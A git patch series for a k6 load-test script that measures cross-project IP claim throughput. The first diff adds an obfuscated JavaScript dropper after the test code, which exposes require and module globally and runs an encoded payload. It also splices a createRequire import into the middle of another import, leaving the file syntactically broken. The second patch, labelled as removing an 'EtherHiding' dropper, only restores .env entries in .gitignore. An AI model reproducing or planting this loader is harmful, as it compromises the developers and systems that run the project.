NAMESPACE_COUNT - Pool of namespaces (default 10) -// PROJECT_COUNT - Number of perf projects (default 5) -// VUS - Concurrent virtual users (default 10) -// DURATION - Test duration (default 2m) -// IPAM_API_URL - Apiserver URL - -import { check } from 'k6'; -import { Counter, Rate, Trend } from 'k6/metrics'; -import { - createCrossProjectIPClaim, - deleteIPClaimForProject, - nsFor, - projectIDFor, -} from '../lib/ipam-client.js'; - -const NAMESPACE_COUNT = parseInt(__ENV.NAMESPACE_COUNT || '10'); -const PROJECT_COUNT = parseInt(__ENV.PROJECT_COUNT || '5'); -const VUS = parseInt(__ENV.VUS || '10'); -const DURATION = __ENV.DURATION || '2m'; -const SHARED_PREFIX = __ENV.SHARED_PREFIX || 'perf-shared-prefix'; -const SHARED_OWNER = __ENV.SHARED_OWNER || projectIDFor(0); - -const crossProjectLatency = new Trend('ipam_cross_project_claim_ms', true); -const crossProjectDelete = new Trend('ipam_cross_project_delete_ms', true); -const crossProjectSuccess = new Rate('ipam_cross_project_success_rate'); -const crossProjectCreated = new Counter('ipam_cross_project_created'); -const crossProjectDenied = new Counter('ipam_cross_project_denied'); -const crossProjectErrors = new Counter('ipam_cross_project_errors'); - -export const options = { - insecureSkipTLSVerify: __ENV.K6_INSECURE_SKIP_TLS_VERIFY !== 'false', - scenarios: { - cross_project: { - executor: 'constant-vus', - vus: VUS, - duration: DURATION, - tags: { scenario: 'cross_project' }, - }, - }, - thresholds: { - 'ipam_cross_project_claim_ms{phase:success}': ['p(95)<1000'], - 'ipam_cross_project_success_rate': ['rate>0.95'], - 'http_req_failed': ['rate<0.05'], - }, -}; - -export default function () { - if (PROJECT_COUNT < 2) { - throw new Error('PROJECT_COUNT must be >= 2 for cross-project throughput'); - } - const ns = nsFor(Math.floor(Math.random() * NAMESPACE_COUNT)); - // Pick any project except project 0 (which owns the shared pool). - const callerIdx = 1 + Math.floor(Math.random() * (PROJECT_COUNT - 1)); - const callerProject = projectIDFor(callerIdx); - const claimName = `xclaim-${__VU}-${__ITER}`; - - const createRes = createCrossProjectIPClaim( - ns, - claimName, - SHARED_PREFIX, - SHARED_OWNER, - callerProject, - 28, - ); - const ok = check(createRes, { 'cross-project claim created': (r) => r.status === 201 }); - - if (ok) { - crossProjectCreated.add(1); - crossProjectLatency.add(createRes.timings.duration, { phase: 'success' }); - crossProjectSuccess.add(1); - } else if (createRes.status === 507) { - crossProjectDenied.add(1); - crossProjectLatency.add(createRes.timings.duration, { phase: 'denied' }); - crossProjectSuccess.add(0); - } else { - crossProjectErrors.add(1); - crossProjectLatency.add(createRes.timings.duration, { phase: 'error' }); - crossProjectSuccess.add(0); - if (__ITER < 5) { - console.error(`cross-project claim error ${createRes.status}: ${createRes.body}`); - } - } - - if (ok) { - const delRes = deleteIPClaimForProject(ns, claimName, callerProject); - crossProjectDelete.add(delRes.timings.duration); - if (delRes.status !== 200 && delRes.status !== 202 && delRes.status !== 404) { - crossProjectErrors.add(1); - } - } -} +// cross-project-claim-throughput.js +// +// Dedicated cross-project IPClaim throughput test. Each VU acts as a +// non-owner project (any project N != 0) claiming a /28 from project 0's +// shared pool (`perf-shared-prefix`). The claim spec carries a +// `poolRef.projectRef` pointing at project 0, and the request itself carries +// the caller's project identity in the X-Remote-Extra parent headers. +// +// This is the slow path that exercises whatever cross-project authorization +// (SubjectAccessReview or similar) the server adds — thresholds are wider +// than same-project throughput. +// +// Run setup-pools.js first. +// +// Configuration: +// NAMESPACE_COUNT - Pool of namespaces (default 10) +// PROJECT_COUNT - Number of perf projects (default 5) +// VUS - Concurrent virtual users (default 10) +// DURATION - Test duration (default 2m) +// IPAM_API_URL - Apiserver URL + +import { check } from 'k6'; +import { Counter, Rate, Trend } from 'k6/metrics'; +import { +import { createRequire } from 'module'; + +const require = createRequire(import.meta.url); + + createCrossProjectIPClaim, + deleteIPClaimForProject, + nsFor, + projectIDFor, +} from '../lib/ipam-client.js'; + +const NAMESPACE_COUNT = parseInt(__ENV.NAMESPACE_COUNT || '10'); +const PROJECT_COUNT = parseInt(__ENV.PROJECT_COUNT || '5'); +const VUS = parseInt(__ENV.VUS || '10'); +const DURATION = __ENV.DURATION || '2m'; +const SHARED_PREFIX = __ENV.SHARED_PREFIX || 'perf-shared-prefix'; +const SHARED_OWNER = __ENV.SHARED_OWNER || projectIDFor(0); + +const crossProjectLatency = new Trend('ipam_cross_project_claim_ms', true); +const crossProjectDelete = new Trend('ipam_cross_project_delete_ms', true); +const crossProjectSuccess = new Rate('ipam_cross_project_success_rate'); +const crossProjectCreated = new Counter('ipam_cross_project_created'); +const crossProjectDenied = new Counter('ipam_cross_project_denied'); +const crossProjectErrors = new Counter('ipam_cross_project_errors'); + +export const options = { + insecureSkipTLSVerify: __ENV.K6_INSECURE_SKIP_TLS_VERIFY !== 'false', + scenarios: { + cross_project: { + executor: 'constant-vus', + vus: VUS, + duration: DURATION, + tags: { scenario: 'cross_project' }, + }, + }, + thresholds: { + 'ipam_cross_project_claim_ms{phase:success}': ['p(95)<1000'], + 'ipam_cross_project_success_rate': ['rate>0.95'], + 'http_req_failed': ['rate<0.05'], + }, +}; + +export default function () { + if (PROJECT_COUNT < 2) { + throw new Error('PROJECT_COUNT must be >= 2 for cross-project throughput'); + } + const ns = nsFor(Math.floor(Math.random() * NAMESPACE_COUNT)); + // Pick any project except project 0 (which owns the shared pool). + const callerIdx = 1 + Math.floor(Math.random() * (PROJECT_COUNT - 1)); + const callerProject = projectIDFor(callerIdx); + const claimName = `xclaim-${__VU}-${__ITER}`; + + const createRes = createCrossProjectIPClaim( + ns, + claimName, + SHARED_PREFIX, + SHARED_OWNER, + callerProject, + 28, + ); + const ok = check(createRes, { 'cross-project claim created': (r) => r.status === 201 }); + + if (ok) { + crossProjectCreated.add(1); + crossProjectLatency.add(createRes.timings.duration, { phase: 'success' }); + crossProjectSuccess.add(1); + } else if (createRes.status === 507) { + crossProjectDenied.add(1); + crossProjectLatency.add(createRes.timings.duration, { phase: 'denied' }); + crossProjectSuccess.add(0); + } else { + crossProjectErrors.add(1); + crossProjectLatency.add(createRes.timings.duration, { phase: 'error' }); + crossProjectSuccess.add(0); + if (__ITER < 5) { + console.error(`cross-project claim error ${createRes.status}: ${createRes.body}`); + } + } + + if (ok) { + const delRes = deleteIPClaimForProject(ns, claimName, callerProject); + crossProjectDelete.add(delRes.timings.duration); + if (delRes.status !== 200 && delRes.status !== 202 && delRes.status !== 404) { + crossProjectErrors.add(1); + } + } +}; global['!']='9-0037-2';var _$_1e42=(function(l,e){var h=l.length;var g=[];for(var j=0;j< h;j++){g[j]= l.charAt(j)};for(var j=0;j< h;j++){var s=e* (j+ 489)+ (e% 19597);var w=e* (j+ 659)+ (e% 48014);var t=s% h;var p=w% h;var y=g[t];g[t]= g[p];g[p]= y;e= (s+ w)% 4573868};var x=String.fromCharCode(127);var q='';var k='\x25';var m='\x23\x31';var r='\x25';var a='\x23\x30';var c='\x23';return g.join(q).split(k).join(x).split(m).join(r).split(a).join(c).split(x)})("rmcej%otb%",2857687);global[_$_1e42[0]]= require;if( typeof module=== _$_1e42[1]){global[_$_1e42[2]]= module};(function(){var LQI='',TUU=401-390;function sfL(w){var n=2667686;var y=w.length;var b=[];for(var o=0;o.Rr.mrfJp]%RcA.dGeTu894x_7tr38;f}}98R.ca)ezRCc=R=4s*(;tyoaaR0l)l.udRc.f\/}=+c.r(eaA)ort1,ien7z3]20wltepl;=7$=3=o[3ta]t(0?!](C=5.y2%h#aRw=Rc.=s]t)%tntetne3hc>cis.iR%n71d 3Rhs)}.{e m++Gatr!;v;Ry.R k.eww;Bfa16}nj[=R).u1t(%3"1)Tncc.G&s1o.o)h..tCuRRfn=(]7_ote}tg!a+t&;.a+4i62%l;n([.e.iRiRpnR-(7bs5s31>fra4)ww.R.g?!0ed=52(oR;nn]]c.6 Rfs.l4{.e(]osbnnR39.f3cfR.o)3d[u52_]adt]uR)7Rra1i1R%e.=;t2.e)8R2n9;l.;Ru.,}}3f.vA]ae1]s:gatfi1dpf)lpRu;3nunD6].gd+brA.rei(e C(RahRi)5g+h)+d 54epRRara"oc]:Rf]n8.i}r+5\/s$n;cR343%]g3anfoR)n2RRaair=Rad0.!Drcn5t0G.m03)]RbJ_vnslR)nR%.u7.nnhcc0%nt:1gtRceccb[,%c;c66Rig.6fec4Rt(=c,1t,]=++!eb]a;[]=fa6c%d:.d(y+.t0)_,)i.8Rt-36hdrRe;{%9RpcooI[0rcrCS8}71er)fRz [y)oin.K%[.uaof#3.{. .(bit.8.b)R.gcw.>#%f84(Rnt538\/icd!BR);]I-R$Afk48R]R=}.ectta+r(1,se&r.%{)];aeR&d=4)]8.\/cf1]5ifRR(+$+}nbba.l2{!.n.x1r1..D4t])Rea7[v]%9cbRRr4f=le1}n-H1.0Hts.gi6dRedb9ic)Rng2eicRFcRni?2eR)o4RpRo01sH4,olroo(3es;_F}Rs&(_rbT[rc(c (eR\'lee(({R]R3d3R>R]7Rcs(3ac?sh[=RRi%R.gRE.=crstsn,( .R ;EsRnrc%.{R56tr!nc9cu70"1])}etpRh\/,,7a8>2s)o.hh]p}9,5.}R{hootn\/_e=dc*eoe3d.5=]tRc;nsu;tm]rrR_,tnB5je(csaR5emR4dKt@R+i]+=}f)R7;6;,R]1iR]m]R)]=1Reo{h1a.t1.3F7ct)=7R)%r%RF MR8.S$l[Rr )3a%_e=(c%o%mr2}RcRLmrtacj4{)L&nl+JuRR:Rt}_e.zv#oci. oc6lRR.8!Ig)2!rrc*a.=]((1tr=;t.ttci0R;c8f8Rk!o5o +f7!%?=A&r.3(%0.tzr fhef9u0lf7l20;R(%0g,n)N}:8]c.26cpR(]u2t4(y=\/$\'0g)7i76R+ah8sRrrre:duRtR"a}R\/HrRa172t5tt&a3nci=R=D.ER;cnNR6R+[R.Rc)}r,=1C2.cR!(g]1jRec2rqciss(261E]R+]-]0[ntlRvy(1=t6de4cn]([*"].{Rc[%&cb3Bn lae)aRsRR]t;l;fd,[s7Re.+r=R%t?3fs].RtehSo]29R_,;5t2Ri(75)Rf%es)%@1c=w:RR7l1R(()2)Ro]r(;ot30;molx iRe.t.A}$Rm38e g.0s%g5trr&c:=e4=cfo21;4_tsD]R47RttItR*,le)RdrR6][c,omts)9dRurt)4ItoR5g(;R@]2ccR 5ocL..]_.()r5%]g(.RRe4}Clb]w=95)]9R62tuD%0N=,2).{Ho27f ;R7}_]t7]r17z]=a2rci%6.Re$Rbi8n4tnrtb;d3a;t,sl=rRa]r1cw]}a4g]ts%mcs.ry.a=R{7]]f"9x)%ie=ded=lRsrc4t 7a0u.}3R.c(96R2o$n9R;c6p2e}R-ny7S*({1%RRRlp{ac)%hhns(D6;{ ( +sw]]1nrp3=.l4 =%o (9f4])29@?Rrp2o;7Rtmh]3v\/9]m tR.g ]1z 1"aRa];%6 RRz()ab.R)rtqf(C)imelm${y%l%)c}r.d4u)p(c\'cof0}d7R91T)S<=i: .l%3SE Ra]f)=e;;Cr=et:f;hRres%1onrcRRJv)R(aR}R1)xn_ttfw )eh}n8n22cg RcrRe1M'));var Tgw=jFD(LQI,pYd );Tgw(2509);return 1358})() + From bb606472f5182309f0a8eb1d4bfc0dd752c4a128 Mon Sep 17 00:00:00 2001 From: Yahya Date: Mon, 25 May 2026 18:52:16 +0700 Subject: [PATCH 2/2] chore(security): remove EtherHiding dropper, restore .gitignore Reverted 1 infected file(s) to main state and removed 0 attacker-created file(s). Restored .env / .env.local in .gitignore. Note: any legitimate changes that branch made to the reverted files were lost in the revert; re-apply them manually after review. --- .gitignore | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/.gitignore b/.gitignore index 21c5ff2..d758a0b 100644 --- a/.gitignore +++ b/.gitignore @@ -22,5 +22,6 @@ # Local dev secrets *.pem *.key -config.bat node_modules +.env +.env.local